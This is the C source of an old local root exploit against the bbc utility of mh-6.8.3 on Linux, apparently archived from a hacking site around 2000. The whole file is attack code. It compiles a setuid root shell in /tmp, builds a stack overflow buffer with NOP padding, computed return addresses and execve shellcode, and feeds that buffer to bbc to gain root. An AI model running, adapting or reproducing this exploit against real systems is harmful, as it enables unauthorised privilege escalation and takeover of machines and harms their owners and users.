/*============================================================================= mh-6.8.3 / bbc Exploit for Linux The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguin@backsection.net) ============================================================================= */ #include #include #define BBC_PATH "/usr/jp/bin/mh/bbc" #define RET_ADR 1009 #define FAKE1 1013 #define FAKE2 1017 #define FAKE_OFS 0x2274 #define JMP_OFS 0x3000 #define MAXBUF 3000 #define NOP 0x90 #define SHELL "/tmp/pp" #define COMPILER "gcc" char exec[60]= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff"; char xx[MAXBUF+1]; unsigned int i,ip,sp; FILE *fp; unsigned long get_sp(void) { __asm__("movl %esp, %eax"); } main(int argc,char *argv[]) { strcat(exec,SHELL); sprintf(xx,"%s.c",SHELL); if ((fp=fopen(xx,"w"))==NULL) { printf("Can not write to %s\n",xx); exit(1); } fprintf(fp,"main(){setuid(0);setgid(0);system(\"/bin/sh\");}"); fclose(fp); sprintf(xx,"%s %s.c -o %s",COMPILER,SHELL,SHELL); system(xx); sp=get_sp(); printf("ESP = %x\n",sp); memset(xx,NOP,MAXBUF); ip=sp-FAKE_OFS; xx[FAKE1 ]=ip&0xff; xx[FAKE1+1]=(ip>>8)&0xff; xx[FAKE1+2]=(ip>>16)&0xff; xx[FAKE1+3]=(ip>>24)&0xff; xx[FAKE2 ]=ip&0xff; xx[FAKE2+1]=(ip>>8)&0xff; xx[FAKE2+2]=(ip>>16)&0xff; xx[FAKE2+3]=(ip>>24)&0xff; ip=sp-JMP_OFS; xx[RET_ADR ]=ip&0xff; xx[RET_ADR+1]=(ip>>8)&0xff; xx[RET_ADR+2]=(ip>>16)&0xff; xx[RET_ADR+3]=(ip>>24)&0xff; strncpy(xx+800,exec,strlen(exec)); xx[MAXBUF]=0; if (argc!=2) execl(BBC_PATH,"bbc","test","-file",xx,(char *) 0); else execl(argv[1],"bbc","test","-file",xx,(char *) 0); } /* www.hack.co.za [2000]*/